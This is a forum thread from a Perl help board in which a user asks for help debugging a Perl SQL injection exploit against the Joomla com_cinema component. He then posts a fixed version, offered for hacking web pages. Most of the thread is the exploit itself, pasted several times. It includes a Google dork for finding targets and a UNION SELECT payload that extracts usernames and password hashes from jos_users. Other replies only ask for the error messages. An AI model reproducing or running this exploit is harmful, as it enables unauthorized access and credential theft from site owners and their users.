Ad:

Perl Discussion Thread
Unsolved
Views: 1796

Oct 24th, 2009

Perl Exploit Need Help

Expand Post »

Hi All,Im a newbie in Perl Coding,and i just cant get this to work it says error compiling

This is an Exploit for Hacking Joomla com_cinema
Heres the Code

Perl Syntax (Toggle Plain Text)
#!/usr/bin/perl -w
 
 
#Joomla Component Cinema 1.0 Remote SQL Injection #
########################################
#[~] Author : **RoAd_KiLlEr**
#[~] Greetz : Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims
#[~] Google_Dork: allinurl: "com_cinema"
########################################
 
system("color FF0000");
print "\t ###############################################################\n\n";
print "\t #       C0ded By: **RoAd_KiLlEr** From Alboz-Crew             #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla Component Cinema 1.0 Remote SQL Injection Vuln   #\n\n";
print "\t # - Google-Dork: allinurl: "com_cinema"                      #\n\n";
print "\t # - Alboz-Crew.Net                                                     #\n\n";
print "\t # - Cod3d by : **RoAd_KiLlEr*                                  #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-9999+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_cinema&Itemid=**RoAd_KiLlEr**&func=detail&id=".$U."1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$c_n."+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
}
 
else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
 }
#!/usr/bin/perl -w


#Joomla Component Cinema 1.0 Remote SQL Injection #
########################################
#[~] Author : **RoAd_KiLlEr**
#[~] Greetz : Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims
#[~] Google_Dork: allinurl: "com_cinema"
########################################

system("color FF0000");
print "\t ###############################################################\n\n";
print "\t #       C0ded By: **RoAd_KiLlEr** From Alboz-Crew             #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla Component Cinema 1.0 Remote SQL Injection Vuln   #\n\n";
print "\t # - Google-Dork: allinurl: "com_cinema"                      #\n\n";
print "\t # - Alboz-Crew.Net                                                     #\n\n";
print "\t # - Cod3d by : **RoAd_KiLlEr*                                  #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-9999+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_cinema&Itemid=**RoAd_KiLlEr**&func=detail&id=".$U."1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$c_n."+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
}

else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
 }

Thank You

Last edited by suki_boy; Oct 24th, 2009 at 4:29 pm.

Similar Threads

Visual Studio zero-day exploit code in the wild in Networking
Good books on Shell Programming/Perl in Perl

suki_boy

Reputation Points: 10

Solved Threads: 1

Newbie Poster

Offline

10 posts
since Jul 2008

Permalink

Oct 25th, 2009

Re: Perl Exploit Need Help

Post the compilation errors.

ithelp

Reputation Points: 769

Solved Threads: 128

Banned

Offline

1,910 posts
since May 2006

Permalink

Oct 25th, 2009

Hey

Click to Expand / Collapse Quote originally posted by ithelp ...

Post the compilation errors.

Thanks but i got it to Work.
Who knows a thing or 2 bout hacking will find this quite useful For Joomla's com_cinema Vulneraiblity and can Hack Some WebPages

Ill Post the Exploit Down

Perl Syntax (Toggle Plain Text)
#!/usr/bin/perl -w
 
#Joomla Component Cinema 1.0 Remote SQL Injection#
########################################
#[~] Author : **RoAd_KiLlEr**
#[~] Greetz : Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims
#---------------------------------------
#---------------------------------------
#[!] Google-Dork: allinurl: "com_cinema"
########################################
 
system("color FF0000");
print "\t ###############################################################\n\n";
print "\t #        C0ded By: **RoAd_KiLlEr**   From Alboz-Crew          #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla Component Cinema 1.0 Remote SQL Injection Vuln     #\n\n";
print "\t # - Alboz-Crew.Net                                            #\n\n";
print "\t # - Greetz:Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims  #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-99999/**/union/**/select/**/";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_cinema&Itemid=**RoAd_KiLlEr**&func=detail&id=".$U."0,1,0x3a,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$c_n."+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
}
else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
}
#!/usr/bin/perl -w

#Joomla Component Cinema 1.0 Remote SQL Injection#
########################################
#[~] Author : **RoAd_KiLlEr**
#[~] Greetz : Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims
#---------------------------------------
#---------------------------------------
#[!] Google-Dork: allinurl: "com_cinema"
########################################

system("color FF0000");
print "\t ###############################################################\n\n";
print "\t #        C0ded By: **RoAd_KiLlEr**   From Alboz-Crew          #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla Component Cinema 1.0 Remote SQL Injection Vuln     #\n\n";
print "\t # - Alboz-Crew.Net                                            #\n\n";
print "\t # - Greetz:Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims  #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-99999/**/union/**/select/**/";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_cinema&Itemid=**RoAd_KiLlEr**&func=detail&id=".$U."0,1,0x3a,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$c_n."+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
}
else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
}

suki_boy

Reputation Points: 10

Solved Threads: 1

Newbie Poster

Offline

10 posts
since Jul 2008

Permalink

Nov 23rd, 2009

Re: Perl Exploit Need Help

still need errors..

Last edited by ov3rcl0ck; Nov 23rd, 2009 at 11:30 am.

ov3rcl0ck

Reputation Points: 35

Solved Threads: 22

Junior Poster

Offline

113 posts
since Sep 2009

This thread is more than three months old

No one has posted to this discussion for at least three months. Please let old threads die and do not reply to them unless you feel you have something new and valuable to contribute that absolutely must be added to make the discussion complete. Otherwise, please start a new thread in this forum instead.

Previous Thread in Perl Forum Timeline: Comparing a particular string present in two text files

Next Thread in Perl Forum Timeline: error on install

DaniWeb Message

Cancel Changes

User Name
Password